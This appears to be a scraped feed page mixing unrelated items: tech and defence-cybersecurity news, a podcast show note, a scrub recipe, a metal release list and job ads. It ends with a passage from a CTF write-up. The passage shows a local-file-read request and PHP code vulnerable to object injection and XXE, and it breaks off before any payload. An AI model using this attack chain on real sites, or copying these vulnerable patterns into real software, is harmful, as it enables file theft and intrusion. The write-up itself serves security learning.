Google held its Pixel 3 hardware event in New York City on October 9, 2018, and unveiled its newest and anticipated phone, the Pixel 3 smartphone, along with a few other hardware devices: the Home Hub, a smart display, and the Pixel Slate. But on the heels of ...

  • Google's Home Hub is Missing a Camera. Here's Why That's a Smart Idea (TIME)
  • Google takes on the iPad Pro and Surface Pro with the Pixel Slate (Mashable)
  • The 5 Most Important Announcements from Google's Pixel Event (Lifehacker)

Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says (NPR)

Passwords that took seconds to guess, or were never changed from their factory settings. Cyber vulnerabilities that were known, but never fixed. Those are two common problems plaguing some of the Department of Defense's newest weapons systems, ...

  • Watchdog: 'Nearly all' new US weapons systems vulnerable to cyber attacks (CNN)
  • An alarming report shows hackers can break into US weapons systems in less than an hour (Business Insider)
  • Weapon Systems Cybersecurity (Government Accountability Office)

The Google+ security flaw that not even the hackers were interested in
This is the security flaw that has put Google+ in check and ended up triggering an inevitable shutdown.
HPR2658: Questions on podcast production

HPR Chat with Al

Al asks Dave a number of questions about podcast audio recording and post-production.

Al is thinking of doing National Podcast Post Month in November

National Podcast Post Month (or NaPodPoMo) is a challenge in a similar vein to National Novel Writing Month (or NaNoWriMo) in which participants are challenged to produce and publish a piece of audio as a podcast, every day for the month of November.

Bad podcast audio

Audio quality is as important as the content being presented. Bad audio is what will cost new podcasters the most in subscriber numbers. An example of good audio is the true crime podcast One Eye Open, which Dave started listening to a couple of weeks ago. As a result of listening to One Eye Open he also picked up a couple of other true crime podcasts whose audio quality is so bad that they can't be heard!

Loudness is a measurement of how loud something is perceived to be. Levelling is the process of ensuring that the individual tracks in a podcast are at an equivalent level, and also that the podcast overall is at an equivalent level to other podcasts that have been levelled the same way.

Our setups

Al and Dave have a very similar microphone setup.

  • Samson Q2U - XLR and USB capable microphone
  • Pop filters and wind screens
  • Boom arm
  • Shock mount

What is a compressor?

The non-technical definition is that it brings up the quiet bits and brings down the louder bits so that your voice has less of a variance if you shout or whisper.

Different microphone types

  • Cardioid - focuses on sounds coming from in front of the mic
  • Omnidirectional - can theoretically pick up sound from all directions
  • Dynamic - well suited for vocal use
  • Condenser - overall better quality sound than dynamic, but more susceptible to background noise, so requires a really quiet studio environment

Your level

You can measure your own level in Audacity - make sure you stay in the green! If you stray into yellow or even red, either lower your level or move slightly away from the mic.

Other people's levels

Concentrate on your own, get others to manage theirs. If you're recording multiple tracks, it can be managed in post-production, but once it's been merged into a single track it's virtually impossible.

File formats

Record in a lossless format, and do your edits and post-production in a lossless format. Only transcode to a lossy format once you're ready to publish your final file.

Monitoring

If you're recording yourself, and you don't want to hear yourself through headphones, take the headphones off.

If you're recording with someone else who is not in the same room, you are better off hearing yourself through your headphones at the same level as the person you're talking to.

Post-production

  • Use Audacity to:
    • align the tracks so that everyone is in the right place
    • convert coughs, sneezes, burps, keyboard sounds, mouse clicks, etc to silence
  • Use Auphonic to:
    • level the individual tracks so that everyone sounds as "loud" as anyone else
    • merge the individual tracks into a single output file (a Multitrack production)
  • Dave also gives a specific use case for adding music into the final mix.

NaPodPoMo revisited

This will be Al's first attempt at NaPodPoMo, but not for Dave. Dave wants to make sure that he plans for this year, so he doesn't run out of material on day 7!!

Dave will interview another NaPodPoMo participant at least once a week during November. Looks like Al will be one of them!

Dave's final thought

Podcasting isn't rocket science. You don't need lots of expensive equipment to produce a podcast. You just need something to record into (e.g. a mobile phone or portable recorder) and somewhere to host it. You can host on your own website or on one of a number of free services, like Anchor, AudioBoom, or indeed Hacker Public Radio!

The obligatory podcast plug

Errata

  • Dave originally said that the pickup pattern that picks up 360 degrees was "unidirectional" - it should have been "omnidirectional" and has been fixed in the edit, but it sounds like it was added in afterwards... which, of course, it was!!

          Ceslava2009: EVERY WOMAN SHOULD KNOW THE RECIPE FOR THIS SCRUB!

This is a quote from a post by БЕЛОЯР_2. Original post: EVERY WOMAN SHOULD KNOW THE RECIPE FOR THIS SCRUB!

It is best used after a bathhouse or sauna, but it can also be used at home, after a bath or a warm shower.

Ingredients:

♦ 1/2 cup sugar
♦ 1/2 cup sea salt
♦ 1/2 cup "Extra virgin" olive oil
♦ 1/2 cup honey
♦ essential oils (ylang-ylang, palmarosa, orange, chamomile; 30 drops in total)
♦ 1 tablespoon shea butter
♦ 1 tablespoon cocoa butter
♦ 25 g cinnamon
♦ 25 g dried ginger
♦ 25 g cocoa powder

Mix the sea salt and sugar, then add the olive oil and your favourite essential oils. There should be no more than 30 drops in total.

Melt the honey in a double boiler and, stirring gradually with a wooden spoon, add the dry ingredients: ginger, cocoa and cinnamon. When the honey has fully melted, let it cool a little and pour the resulting mixture into the salt, sugar and olive oil.

The "Lakshmi" scrub can be stored in a clean jar. A couple of spoonfuls is enough for one use.

It is best used after a bathhouse or sauna, but it can also be used at home, after a bath or a warm shower. Apply the scrub over the whole body with massaging movements, then rinse it off with warm water, without soap. It rinses off easily, and afterwards the skin is moisturised, soft and pleasantly scented.

The effect lasts about a week, so there is no need to use this scrub every day.

based on material from the site: «НАРОДНАЯ МЕДИЦИНА»


          to consider 2018 "the BIG list" (no replies)
New adds: John Diva & The Rockets Of Love (feb 2019), Billybio (nov)

The latest updates are in bold.


OCT 2018
Anthrax: State Of Euphoria 30th-anniversary 5.10 Island Records
Axxis: Monster hero 5.10 Phonotraxx
Coheed And Cambria: The unheavenly creatures 5.10 Roadrunner Records
Dee Snider: Sick Mutha F**kers - Live in the USA 5.10 earMUSIC
Hank Erix (Houston): Nothing but trouble 5.10 Cargo Records
High On Fire: Electric messiah 5.10 eOne
Leah: The quest 5.10 Inner Wound Recordings
Matt Nathanson: Sings his sad heart 5.10 Acrobat
Monuments: Phronesis 5.10 Century Media
Poets of the Fall: Ultraviolet 5.10 Insomniac
Steve Perry: Traces 5.10 Concord Records
Vola: Applause of a distant crowd 5.10 Mascot
Atreyu: In our wake 12.10 Spinefarm Records
Black Tiger: Black Tiger 12.10 Tanzan Music
City Of Thieves: Beast reality 12.10 Frontiers Records
Creye: Creye 12.10 Frontiers Records
Darkness: First class violence 12.10 Massacre Records
Dave Davies: Decade 12.10 Red River Entertainment
Evanescence: Synthesis Live 12.10 Eagle
Gama Bomb: Speed between the lines 12.10 AFM Records
God´s Army: Demoncracy 12.10 Rock Of Angels Records
Impellitteri: The nature of the beast 12.10 Frontiers Records
Kadavar: Live in Copenhagen 12.10 Nuclear Blast
London: Call that girl 12.10
Nazareth: Tattooed on my brain 12.10 Frontiers Records
RebelHot: Uncomfortableness 12.10 Metalapolis Records
Rose Tattoo: Scarred For Live (5cd box) 12.10
Seventh Wonder: Tiara 12.10 Frontiers Records
Smash Into Pieces: Evolver 12.10 Gain/ Sony Music
Terrorizer: Caustic attack 12.10 The End Records
Verni: Barricade 12.10 Mighty Music
Heir Apparent: The view from below 15.10 No Remorse Records
Ace Frehley: Spaceman 19.10 eOne/SPV
Aldo Nova: 2 19.10
Amaranthe: Helix 19.10 Spinefarm Records
Arion: Life is not beautiful 19.10 AFM Records
Bonfire: Legends 19.10
Disturbed: Evolution 19.10
Firmo: Rehab 19.10 Street Symphonies Records
Gorod: Aethra 19.10 Overpowered Records
Greta Van Fleet: Anthem of the peaceful army 19.10 Lava/Republic Records
Hearts Of Fire: Call of destiny 19.10 MelodicRock Records
Internal Bleeding: Corrupting influence 19.10 Unique Leader Records
Kiss: The Solo Albums - 40th Anniversary Collection 19.10 Casablanca/UME
Marty Friedman: One bad M.F. Live!! 19.10 Prosthetic Records
Medina Azahara: Trece rosas 19.10 Senador Music
Midnite City: There goes the neighbourhood 19.10 AOR Heaven
Nothing But Thieves: What did you think when you made me this way EP 19.10 RCA
Roulette: Now! 19.10
Saliva: 10 Lives 19.10 Megaforce Records
Saxon: The eagle has landed 19.10 BMG
Soulfly: Ritual 19.10 Nuclear Blast
Spectra (Kenny Leckremo): Spectra 19.10
Whitesnake: Unzipped cd-box 19.10
Bloodbath: The arrow of Satan is drawn 26.10 Peaceville Records
C.T.P: Point Blank 26.9
Chevelle: 12 Bloody spies 26.10 Epic Records
Fifth Angel: The third secret 26.10 Nuclear Blast
Gary Moore Tribute: Moore Blues for Gary 26.10
Haken: Vector 26.10 Inside Out Records
Hamlet: Berlin 26.10
Hate Eternal: Upon desolate sands 26.10 Season Of Mist
Heaven's Trail: Lethal mind 26.10 Escape Records
Icarus Witch: Goodbye cruel world 26.10 Cleopatra Records
The Kinks: The Kinks are the village green preservation society 50th-anniversary 26.10 BMG Records
Nothgard: Malady X 26.10 Metal Blade Records
Picture: Live 40 years Heavy Metal ears 78-18 26.10 Pure Steel Records
Sirenia: Arcane astral aeons 26.10 Napalm Records
Striker: Play to win 26.10 Record Breaking Records
Unleashed: The hunt for white Christ 26.10 Napalm Records
Warrel Dane: Shadow work 26.10 Century Media Records
Westfield Massacre: Salvation 26.10 Nerve Strike Records
White Widdow: Victory 26.10 AOR Heaven Records
Perfect View: Timeless 29.10 Lions Pride Music
Tourniquet: Gazing at Medusa Pathogenic Records

NOV 2018
Arsis: Visitant 2.11 Nuclear Blast Records
Audiotopsy: The real now 2.11 Megaforce Records
Cancer: Shadow gripped 2.11 Peaceville Records
Eden´s Curse: Testament, the best 2.11 AFM Records
Hank Von Hell: Egomania 2.11 Sony Music
The Heard: The island 2.11 Despotz Records
Metallica: …And Justice For All 2.11 Blackened Records
The Neal Morse Band: Morsefest! 2017 2.11
Opeth: Garden of the titans: Live at Red Rocks Amphitheatre 2.11 Nuclear Blast
Roadkill: Ruled by machines 2.11 MelodicRock Records
Robert Rodrigo Band: Living for louder 2.11
Sick Of It All: Wake the sleeping dragon! 2.11 Century Media Records
Steven Wilson: Home invasion: In concert at The Royal Albert Hall 2.11 Caroline International
Witherfall: A prelude to sorrow 2.11 Century Media Records
All That Remains: Victim of the new disease 9.11 Razor & Tie Records
Architects: Holy hell 9.11 Epitaph Records
Burning Witches: Hexenhammer 9.11 Nuclear Blast records
Evoken: Hypnagogia 9.11 Profound Lore Records
Flotsam And Jetsam: The end of chaos 9.11 AFM Records
Holter: Vlad the impaler 9.11 Frontiers Records
Jimi Hendrix: Electric ladyland 50TH An. 9.11 Legacy Recordings
Lacuna Coil: The 119 Show - Live in London 9.11
Lucifer's Child: The order 9.11 Agonia Records
Nordic Union: Second coming 9.11 Frontiers Records
Phenomena: I, II, III 9.11 Cherry Red Records
Radiant: Radiant 9.11
Red Dragon Cartel: Patina 9.11 Frontiers Records
Reece: Resilient heart 9.11 Mighty Music
Stephen Pearcy: View to a thrill 9.11 Frontiers Records
Ted Nugent: The music made me do it 9.11
Ten: Illuminati 9.11 Frontiers Records
Muse: Simulation theory 12.11 Warner Bros Records
Afire: On the road from nowhere 16.11 Concorde Music Company
Amon Amarth: The pursuit of Vikings: 25 years in the eye of the storm 16.11 Metal Blade Records
Artillery: The face of fear 16.11 Metal Blade Records
Chris Cornell: Retrospective box 16.11 UMG Recordings
Memphis May Fire: Broken 16.11 Rise Records
Nita Strauss: Controlled chaos 16.11 Sumerian Records
P.O.D: Circles 16.11 Mascot Label Group
Rush: Hemispheres 40Th anniv 16.11 UMe/Anthem/ole
Smashing Pumpkins: Shiny and oh so bright, Vol. 1 / LP: No past. No future. No sun 16.11 Napalm Records
Accept: Symphonic Terror - Live At Wacken 2017 23.11 Nuclear Blast
Brett Walker: Last parade 6CD Box Set 23.11 MelodicRock Records
Care Of Night: Love equals war 23.11 AOR Heaven Records
Cattle Decapitation: Medium rarities 23.11 Metal Blade Records
Dan Reed Network: Origins 23.11 Zero One Entertainment
Electric Boys: The ghost ward diaries 23.11 MIGHTY Music
Jean Beauvoir: Rock Masterpieces Vol.2 23.11 AOR Heaven
Sodom: Partisan EP 23.11 SPV/Steamhammer
Vandenberg's MoonKings: Rugged and unplugged 23.11 Mascot Records
Virgin Steele: Seven Devils Moonshine - 35th anniv. 23.11 SPV/Steamhammer
Master: Vindictive miscreant 28.11 Transcending Obscurity Records
Billybio: Feed the fire 30.11 AFM Records
Chrome Division: One last ride 30.11 Nuclear Blast Records
Hush: If you smile 30.11 Lions Pride Music
Donnie Vie: Beautiful things
Jerome Mazza: solo album Escape Music

DEC 2018
Alcatrazz: Parole denied - Tokyo 2017 7.12 Frontiers Records
Buckets Rebel Heart: 20 Good summers 7.12 Pride & Joy Music
Devil's Hand: 7.12 Frontiers Records
Gotthard: Defrosted II 7.12 Nuclear Blast Records
Johnny Gioeli: One Voice 7.12 Frontiers Records
Magic Dance: New eyes 7.12 Frontiers Records
Metal Church: Damned if you do 7.12 Rat Pak Records
Palace: Binary music 7.12 Frontiers Records
State Of Salazar: Superhero 7.12 Frontiers Records
Steelheart: Rock'N Milan 7.12 Frontiers Records
Dark Moor: Origins 12.12 King Records
Within Temptation: resist 14.12 Spinefarm Records
Sinestress: Fear Art Of Melody Music
Terra Nova: Raise your voice

2018
220 Volt
38 Special:
91 Suite: new album
Abysmal Dawn: new album Season Of Mist Records
Adriangale: MelodicRock Records
Alissa (White-Gluz): solo album Napalm Records
Allen/Lande:
Angelus Apatrida: Hidden Livevolution
Animal Drive: Frontiers Records
Art Nation:
Atheist: new album Agonia Records
Axe: The last offering Escape Music
Baby Snakes:
Bad Brains: new album
Beggars & Thieves: live album
Beggars & Thieves: new album
Benediction:
Biffy Clyro: Balance, not symmetry
Block Buster:
Brainstorm:
Brian Howe:
Brigade
The Brink: Frontiers Records
Bruce Dickinson:
Bryan Cole: Desire Kivel Records
Burning Rain: new album Frontiers Records
Carcass:
Catalano:
Cheap Trick
Circus Maximus
Coastland Ride:
Come Taste The Band: new album AOR Heaven
Coroner:
The Crown: new album Metal Blade Records
Cruzh:
Crystal Ball: new album
The Damned: new album Search & Destroy Records
D.A.D:
Dalton:
Dare: new album
Dare: Best of
Dark Angel:
Darkhorse:
The Darren Phillips Project:
Dave Bickler: Darklight
Death Dealer:
Dead Of Night: Pride & Joy Music
Diamond Head:
Dino Cazares: solo album
DIO Disciples: debut album BMG
East Temple Avenue
Entombed A.D:
Fahran: Vapours
Gathering Of Kings:
Göran Edman:
Gypsy Rose: new album
Hackers:
Hittman:
Hoobastank: new album Napalm Records
House Of Shakira:
Hurricane:
Incognito: s/t Kivel Records
Jack Russell’s Great White: Once acoustically bitten
JaR:
Jesse Damon
Jonathan Davis
John Sykes: Sy-Ops
Jordan Rudess: new album Mascot Records
Jorn: new album Frontiers Records
Jorn: Box Set
Jungle Rot: new album Victory Records
Kane Roberts: new album Frontiers Records
Killer Bee:
Lagoon:
Lillian Axe: From Womb To Tomb
Lita Ford:
Mad Invasion:
Magnum: Live album
Mason Hill: Frontiers Records
Mats Karlsson
Mick Mars: solo album
Michael Monroe:
Michael Thompson Band:
MisterMiss:
Mother Road:
MPG "Martie Peters Group": Unfinished business
Nile:
Nils Patrik Johansson: Evil Deluxe MetalVille Records
Nitro:
Obús: new album
The Offspring: new album
On The Rise:
One Desire:
The Order:
Outlasted: new album MelodicRock Records
Pete Way: solo album
Player:
Pleasure Maker: Dancin' with danger Lions Pride Music
Pretty Maids: live-dvd/cd Frontiers Records
Rachel Lorin: new album Frontiers Records
Raspberry Park: new album AOR Heaven Records
Razor:
Reckless Love
Rival Sons: new album Low Country Sound/Atlantic
Romeo's Daughter:
The Ron Keel Band:
Royal Flush
Royal Mess
Saint Deamond
Santa Ana Winds: Inherit the wind AOR Blvd Records
Sebastian Bach:
Silent:
Skeletonwitch:
Spirits Of Fire: Frontiers Records
Starz:
State Cows: Challenges
State Of Rock: new album AOR Heaven
Steve Overland:
The Swedish Funk Connection:
Tango Down: new album Kivel Records
Tempt:
Tom Keifer:
Tony Martin: Thornz
Toseland: new album Frontiers Records
Venom:
Viana:
Vimic: Open your omen Universal Music Enterprises
Violet Janine:
Warlord: new album Frontiers Records
Waysted:
Work of Art
X Japan:
XYZ: new album

2019
7HY: new album Lions Pride Music
Alan Parsons: new album Frontiers Records
Anthrax:
Armored Saint: new album
Assassin: new album Massacre Records
Avenged Sevenfold:
Backyard Babies: Silver and gold Century Media
Battle Beast
Biff Byford: School of hard knocks
Black Star Riders: new album
Brother Firetribe: new album
Buckcherry: Warpaint
Bush:
Danko Jones: new album AFM Records
Danny Vaughn: solo album
Def Leppard:
Delain: new album
Demons & Wizards
Dokken:
Down 'N' Outz
The End:
Exciter:
Exodus:
Extreme:
Fair Warning: new album
Faithsedge:
Find Me: new album
Fit For An Autopsy: album debut Nuclear Blast
Fortune: comeback album Frontiers Records
Hammerfall:
Helix:
Helloween: live album Nuclear Blast
Jim Peterik´s World Stage: Winds of change
Killer Dwarfs: new album EMP Label Group
Killswitch Engage: New album Metal Blade Records
King Of Hearts: new album
King's X: new album Golden Robot Records
Korn:
Kreator:
Last In Line:
Leverage: new album Frontiers Records
The Magpie Salute: High water II Mascot/Eagle Rock
Malevolent Creation: The 13th beast Century Media
Megadeth:
Mike Tramp: new album Target Records
Neal Morse Project: Jesus Christ - The Exorcist Frontiers Records
Overkill:
Papa Roach:
Pearl Jam:
Pretty Maids: new album
Queensryche:
Rammstein:
Ratt:
Richie Sambora: solo album
Rob Zombie:
Room Experience: Another time and place
Roxy Blue: new album Frontiers Records
Running Wild:
Sabaton:
Sacred Reich: new album Metal Blade Records
Sadus:
Sascha Paeth:
Septicflesh: new album Nuclear Blast
Slipknot:
Soilwork: new album Nuclear Blast
Sons Of Apollo: new live dvd/BluRay
Spread Eagle: new album Frontiers Records
Stratovarius: new album
Symphony X:
Tarja Turunen: new album
Ted Poley: new album Frontiers Records
Terra Nova:
Thunder:
Tesla: Shock Frontiers Records
Tora Tora: new album Frontiers Records
The Treatment: new album Frontiers Records
Volbeat: new album
Waiting For Monday: debut album Frontiers Records
Whitesnake: Flesh & Blood

JAN 2019
Legion Of The Damned: Slaves of the shadow realm 4.1 Napalm Records
Bring Me The Horizon: Amo 11.1 Columbia Records
Carnal Forge: Gun to mouth salvation 25.1 ViciSolum Productions
Jetboy: Born to fly 25.1 Frontiers Records
Skunk Anansie: 25LIVE@25 25.1 Republic Of Music
Starbreaker: new album 25.1 Frontiers Records
The Circle: Space between
Evergrey: The Atlantic AFM Records

FEB 2019
Avantasia: Moonglow 1.2 Nuclear Blast
John Diva & The Rockets Of Love: Mama said Rock is dead 8.2 Steamhammer/SPV
Rock Goddess: This time 22.2 Bite You To Death Records
Dream Theater: new album
Fiction Syxx: The alternate me MelodicRock Records
Inglorious: new album Frontiers Records
Overkill: new album

MAR 2019
Children Of Bodom: new album
Venom INC: new album

APR 2019
Testament: new album

MAY 2019
Bai Bang: Best Of 4 Lions Pride Music

SEP 2019
Dragonforce: new album

2020
Helloween: new album Nuclear Blast
Nightwish: new album

          400 of these are going to the Hackaday Superconference @hackaday @hackadayio #supercon @adafruit
400 of these hackable Python powered devices are going to the Hackaday Superconference | Pasadena Nov 2-4 2018. Adafruit is a sponsor. The Hackaday Superconference is the greatest gathering of hardware hackers, builders, engineers and enthusiasts in the world. Supercon 2018 is 3 full days! Join us November 2-4 (2018) in Pasadena, CA. The conference begins on […]
          Cyber Tests Showed 'Nearly All' New Pentagon Weapons Vulnerable To Attack, GAO Says

Passwords that took seconds to guess, or were never changed from their factory settings. Cyber vulnerabilities that were known, but never fixed. Those are two common problems plaguing some of the Department of Defense's newest weapons systems, according to the Government Accountability Office.

The flaws are highlighted in a new GAO report, which found the Pentagon is "just beginning to grapple" with the scale of vulnerabilities in its weapons systems.

Drawing data from cybersecurity tests conducted on Department of Defense weapons systems from 2012 to 2017, the report says that by using "relatively simple tools and techniques, testers were able to take control of systems and largely operate undetected" because of basic security vulnerabilities.

The GAO says the problems were widespread: "DOD testers routinely found mission critical cyber vulnerabilities in nearly all weapon systems that were under development."

When weapons program officials were asked about the weaknesses, the GAO says, they "believed their systems were secure and discounted some test results as unrealistic."

The agency says the report stems from a request from the Senate Armed Services Committee, asking it to review the Pentagon's efforts to secure its weapons systems. The GAO did so by going over data from the Pentagon's own security tests of weapon systems that are under development. It also interviewed officials in charge of cybersecurity, analyzing how the systems are protected and how they respond to attacks.

The stakes are high. As the GAO notes, "DOD plans to spend about $1.66 trillion to develop its current portfolio of major weapon systems." That outlay also comes as the military has increased its use of computerized systems, automation and connectivity.

Despite the steadily growing importance of computers and networks, the GAO says, the Pentagon has only recently made it a priority to ensure the cybersecurity of its weapons systems. It's still determining how to achieve that goal — and at this point, the report states, "DOD does not know the full scale of its weapon system vulnerabilities."

Part of the reason for the ongoing uncertainty, the GAO says, is that the Defense Department's hacking and cyber tests have been "limited in scope and sophistication." While they posed as hackers, for instance, the testers did not have free rein to attack contractors' systems, nor did they have the time to spend months or years to focus on extracting data and gaining control over networks.

Still, the tests cited in the report found "widespread examples of weaknesses in each of the four security objectives that cybersecurity tests normally examine: protect, detect, respond, and recover."

From the GAO:

"One test report indicated that the test team was able to guess an administrator password in nine seconds. Multiple weapon systems used commercial or open source software, but did not change the default password when the software was installed, which allowed test teams to look up the password on the Internet and gain administrator privileges for that software. Multiple test teams reported using free, publicly available information or software downloaded from the Internet to avoid or defeat weapon system security controls."

In several instances, simply scanning the weapons' computer systems caused parts of them to shut down.

"One test had to be stopped due to safety concerns after the test team scanned the system," the GAO says. "This is a basic technique that most attackers would use and requires little knowledge or expertise."

When problems were identified, they were often left unresolved. The GAO cites a test report in which only one of 20 vulnerabilities that were previously found had been addressed. When asked why all of the problems had not been fixed, "program officials said they had identified a solution, but for some reason it had not been implemented. They attributed it to contractor error," the GAO says.

One issue facing the Pentagon, the GAO says, is the loss of key personnel who are lured by lucrative offers to work in the private sector after they've gained cybersecurity experience.

The most capable workers – experts who can find vulnerabilities and detect advanced threats – can earn "above $200,000 to $250,000 a year" in the private sector, the GAO reports, citing a Rand study from 2014. That kind of salary, the agency adds, "greatly exceeds DOD's pay scale."

In a recent hearing on the U.S. military's cyber readiness held by the Senate Armed Services Committee, officials acknowledged intense competition for engineers.

"The department does face some cyberworkforce challenges," said Essye B. Miller, the acting principal deputy and Department of Defense chief information officer. She added, "DOD has seen over 4,000 civilian cyber-related personnel losses across our enterprise each year that we seek to replace due to normal job turnover."

Copyright 2018 NPR. To see more, visit http://www.npr.org/.

          Google's Home Hub is Missing a Camera. Here's Why That's a Smart Idea - TIME

At Tuesday's Google event, the company unveiled the extensively leaked Pixel 3 and 3 XL smartphones, in addition to both a new ChromeOS tablet, the Pixel Slate, and a new smart home assistant in the form of Google Home Hub. While Google's made ...

Google takes on the iPad Pro and Surface Pro with the Pixel Slate (Mashable)
The 5 Most Important Announcements from Google's Pixel Event (Lifehacker)
Pixel 3 launch: Google unveils new smartphone and Home Hub smart screen (Telegraph.co.uk)

          An alarming report shows hackers can break into US weapons systems in less than an hour - Business Insider

A new Government Accountability Office (GAO) report shows Department of Defense vulnerabilities dating back to the 1990s. Hackers used unsophisticated, easily accessible equipment to access a DoD weapons system in only one hour. Current ...

Government watchdog says US weapons systems are vulnerable to hacks, but the Pentagon is slow to act (TechCrunch)

          Sony begins suing users who sell jailbroken PS4 consoles

Specifically, a man in California has officially been sued by Sony for selling jailbroken PS4 consoles on eBay. The PlayStation 4 is now five years old. Recently, hackers have repeatedly jailbroken this console on multiple firmware versions so that pirated games can be played […]

The post "Sony begins suing users who sell jailbroken PS4 consoles" appeared first on TRAINGHIEMSO.VN.


          US slow to protect itself from cyberattack - report
The Pentagon has been slow to protect major weapon systems from cyber attacks and routinely found critical vulnerabilities that hackers could potentially exploit in those systems, a federal government report said on Tuesday.
          The Complete Guide to Crowdsourced Security Testing

The old way of doing security has failed, and more organizations are starting to trust crowdsourced ethical hackers to help with the growing demands of cybersecurity in a world that is technologically complex and increasingly threatened. As Crowdsourced Testing Solutions, including bug bounty programs, vulnerability discovery and hacker-powered penetration testing solutions have become viable options for a growing number of security leaders in recent years, defining the landscape and describing the differences and evolution of different offerings is overdue. 

We have based the analysis in this report on the data we have gathered through thousands of tests over the last few years, including hacker demographics, hacker activity, vulnerabilities found, vulnerabilities not found (but searched for), customer demographics, customer asset data and the security of those assets over time.

 




          Comment on Watch How Fast A Tesla Model 3 Goes In Reverse by J. L. Brown
A hacker could do this with a little reverse engineering? ;)
          Exposed data of 500,000 people on Google+: Europe wants Google to explain itself
Europe has decided to take a particular interest in the shutdown of Google+ announced last night. Google disclosed that a problem in its API allowed hackers to retrieve the information of 500,000 people, which should not have been possible. Problem …



          Tour Edge Exotics EXS Irons

Fresh off the heels of the metal woods and hybrids being announced for the EXS…

The post Tour Edge Exotics EXS Irons appeared first on The Hackers Paradise.


          Senior Consultant, Red Team - Deloitte - Montréal, QC
We’ve already performed hacking for our clients world-wide and in all industry sectors, and we’re now looking for hackers who are ready to respond to the most...
From Deloitte - Fri, 28 Sep 2018 07:36:20 GMT - View all Montréal, QC jobs
          Users report lost files and Microsoft stops recommending the Windows 10 October update

Those who had problems should contact technical support, but those who have already installed it without problems do not need to uninstall the package.

Microsoft has halted distribution of the Windows 10 October Update after users reported that files were disappearing from their computers during the update process. The cause of the problem is still under investigation, but Microsoft will no longer distribute the package through Windows Update and also recommends that users wait and not use any installation media they have already prepared.

According to reports on the web, the disappearing files can even affect standard Windows folders such as "Documents", which can mean the loss of important user files. Many people installed the update without any difficulty or unwanted consequence. The combination of factors that makes the error appear is unknown, but those who updated without problems do not need to uninstall the update. Those who installed the update and had problems should contact Microsoft technical support; contact information for technical support can be found on this page. Since there is a chance of recovering what was lost, it is recommended to avoid using the affected device, to reduce the chance of the files being overwritten with other data.

Problem was reported and ignored

In 2014, publications such as "ZDNet" and "Bloomberg" observed that Microsoft planned to reduce the number of dedicated test engineers. Instead, that role would be performed by project managers or by the developers themselves, with other testing left to the "Insiders", who are volunteers. The management of the Insider program itself, however, has been criticised. Several users of Windows Insider test builds reported through Microsoft's "Feedback Hub" tool that files were disappearing. The warnings, however, were apparently not enough.

Windows has faced significant problems in several updates. In 2016, for example, an update caused many webcams to stop working. In January, a security update was also suspended for leaving computers with AMD parts inoperable; Microsoft blamed the problem on an "error in the documentation" from AMD itself.

Questions about security, hackers and viruses? Send them to g1seguranca@globomail.com
          Growth Hacker - KLF Group - Montréal, QC
Experience with growth hacking tools. We’re looking for a Growth Hacker to help find creative ways to over-deliver on our ambitious client acquisition targets....
From Indeed - Tue, 25 Sep 2018 21:31:43 GMT - View all Montréal, QC jobs
          H1-5411 CTF Write-up by erbbysam and ziot

H1-5411 CTF Write-up by erbbysam and ziot

Authors: Sam Erb, Brett Buerhaus

erbbysam and I recently set out to beat the latest CTF challenge hosted by HackerOne. Here is a write-up with the process we took from start to finish.

The h1-5411 CTF begins with a tweet from HackerOne:

We bring the memes! First 10 winners get a ticket to hack with us at h1-5411 on Saturday for up to $150K in bounties! #h15411 #memeCTF #eko14 #togetherwehitharder pic.twitter.com/hDvnehMxou

― HackerOne (@Hacker0x01) September 26, 2018

This leads you to the CTF website:

https://h1-5411.h1ctf.com/

The website allows you to select a meme template, top text, and bottom text. This generates a meme, saved to your session, that is either an image or a txt file.


(Screenshot: Generating a Meme)

The POST request looks like the following:

POST /api/generate.php HTTP/1.1
Host: h1-5411.h1ctf.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://h1-5411.h1ctf.com/generate.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 63
Cookie: PHPSESSID=qpvh9cil4heghbjdq6cp4vfbgs
Connection: close

template=template4.txt&type=text&top-text=test&bottom-text=test

The template parameter sets a filename to use as part of the meme generation process.

As you may guess, the template variable is vulnerable to Local File Read (LFR). As long as you set it to a txt template, you can specify any arbitrary file on the system and fetch its contents. Here's an example of fetching PHP source code:

Here you can see the source code when viewing your saved memes:

After enumerating from index.php through every file pulled in by each include(), we eventually had the source code for the entire application. The next step was to figure out what other vulnerabilities exist in the app.

In the /includes/classes.php file, the first thing that stands out is that they are intentionally disabling XXE protection.

That means DOMDocument->loadXML() will process external entities and DTDs, so an XXE payload placed in the config would be executed. The question from here is how we set the ConfigFile class's config_raw variable.

From the /includes/header.php file, there are two interesting files that you cannot discover without the LFR vulnerability.

/import_memes_2.0.php
/export_memes_2.0.php

Each one sends a POST request to files of the same name in the /api/ directory.

/api/import_memes_2.0.php:

<?php
require_once("../includes/config.php");
if (isset($_FILES['f'])) {
    $new_memes = unserialize(base64_decode(
        file_get_contents($_FILES['f']['tmp_name'])));
    $_SESSION['memes'] = array_merge($_SESSION['memes'], $new_memes);
}
header("Location: /memes.php");
?>

/api/export_memes_2.0.php:

<?php
require_once("../includes/config.php");
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.time().'_export.memepak"');
echo base64_encode(serialize($_SESSION['memes']));
?>

With the import API script, we are able to feed input into unserialize() through a file-upload POST request. The uploaded data, once unserialized, gets merged into $_SESSION["memes"], where all of your memes are saved.

Now that we knew we could create PHP objects via unserialize (object injection) and knowing that there is an XXE in the ConfigFile class, we had to figure out how to put it all together.

The ConfigFile class has a magic method, __toString(), that gets called any time an instance of the class is treated as a string. That usually means whenever a variable holding the object is passed to echo, print, print_r, etc.

function __toString() {
    $this->parse();
    $debug = "";
    $debug .= "Debug Info :\n";
    $debug .= "TopText => {$this->top_text}\n";
    $debug .= "BottomText => {$this->bottom_text}\n";
    $debug .= "Template Location => {$this->template}\n";
    $debug .= "Template Type => {$this->type}\n";
    return $debug;
}

We’ll talk about how that gets triggered after further explaining the attack. Following the __toString() execution chain, we see that it immediately calls the parse() function.

function parse() {
    $dom = new DOMDocument();
    $dom->loadXML($this->config_raw, LIBXML_NOENT | LIBXML_DTDLOAD);
    $o = simplexml_import_dom($dom);
    $this->top_text = $o->toptext;
    $this->bottom_text = $o->bottomtext;
